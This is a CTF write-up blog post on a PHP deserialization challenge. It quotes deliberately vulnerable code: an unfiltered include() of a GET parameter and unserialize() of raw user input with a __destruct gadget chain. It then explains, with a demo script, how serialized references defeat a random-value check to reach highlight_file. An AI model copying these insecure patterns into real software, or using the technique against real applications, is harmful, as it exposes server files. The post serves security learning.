Notes on a deserialization challenge


<?php
error_reporting(0);
$file = $_GET["file"];
$p = $_GET["p"];
if (isset($file)) {
    echo 'NONONO' . '<br>';

    if (preg_match("/flag/", $file)) {
        die('HACKER GOGOGO!!!');
    }
    @include($file);

    if (isset($p)) {
        $p = unserialize($p);
    } else {
        echo "NONONO";
    }
}
?>
<!-- You can try ?file=xxxx, and check the code in try.php -->

try.php

<?php
class Seri{
    public $alize;
    public function __construct($alize) {
        $this->alize = $alize;
    }
    public function __destruct(){
        $this->alize->getFlag();
    }
}

class Flag{
    public $f;
    public $t1;
    public $t2;

    function __construct($file){
        echo "Another construction!!";
        $this->f = $file;
        $this->t1 = $this->t2 = md5(rand(1,10000));
    }

    public function getFlag(){
        $this->t2 = md5(rand(1,10000));
        echo $this->t1;
        echo $this->t2;
        if($this->t1 === $this->t2)
        {
            if(isset($this->f)){
                echo @highlight_file($this->f,true);
            }
        }
    }
}

?>

This is a simplified version of justsoso from the 12th National College Student Information Security Contest (信安大赛).

Here getFlag() is called on $alize, so $alize must be an instance of the Flag class.

The only problem to solve is how to make t1 and t2 equal, since both are random: the constructor gives them the same md5, but getFlag() re-randomizes t2 right before the comparison.

Unlike C, PHP has references, and PHP's serialization format preserves them.

So make t1 a reference to t2: both property names then point at the same value, and whatever getFlag() assigns to t2 is also what t1 holds, so the comparison is necessarily equal.
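An added example (not from the original post) showing why references make the check pass: serialize() records that t1 and t2 alias one value with an R: token, and unserialize() rebuilds the alias, so re-randomizing t2 inside getFlag() also changes t1. The Flag class below is a stripped-down copy of try.php with check() standing in for getFlag(); the path demo.txt is a constructed placeholder.

```php
<?php
// Added example, not code from the original challenge: demonstrates how
// PHP serialization preserves references between two properties.

class Flag {
    public $f;
    public $t1;
    public $t2;

    public function check(): bool {
        // Mirrors getFlag() in try.php: t2 is re-randomized before comparing.
        $this->t2 = md5((string) rand(1, 10000));
        return $this->t1 === $this->t2;
    }
}

// Build the object in code: t1 becomes a reference to t2.
$obj = new Flag();
$obj->f = 'demo.txt';                  // constructed placeholder path
$obj->t2 = md5((string) rand(1, 10000));
$obj->t1 = &$obj->t2;

$s = serialize($obj);
echo $s, PHP_EOL;
// The serialized form carries an R: token in place of t2's value:
// O:4:"Flag":3:{s:1:"f";s:8:"demo.txt";s:2:"t1";s:32:"...";s:2:"t2";R:3;}
// Values are numbered from 1 (the object), so f is 2, t1 is 3, and
// R:3 makes t2 an alias of t1.

// Round trip: unserialize() rebuilds the reference, so both names point to
// one value and check() returns true no matter which random md5 is drawn.
$copy = unserialize($s);
var_dump($copy->check());              // bool(true)

// Defensive counterpart: allowed_classes => false (PHP >= 7.0) keeps
// unserialize() from instantiating Flag or Seri, so no __destruct() chain
// runs on untrusted input; the result is a __PHP_Incomplete_Class.
$safe = unserialize($s, ['allowed_classes' => false]);
var_dump(get_class($safe));            // string(22) "__PHP_Incomplete_Class"
```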

posted @ 2020-08-09 10:46  vstar_o  Views (187)  Comments (0)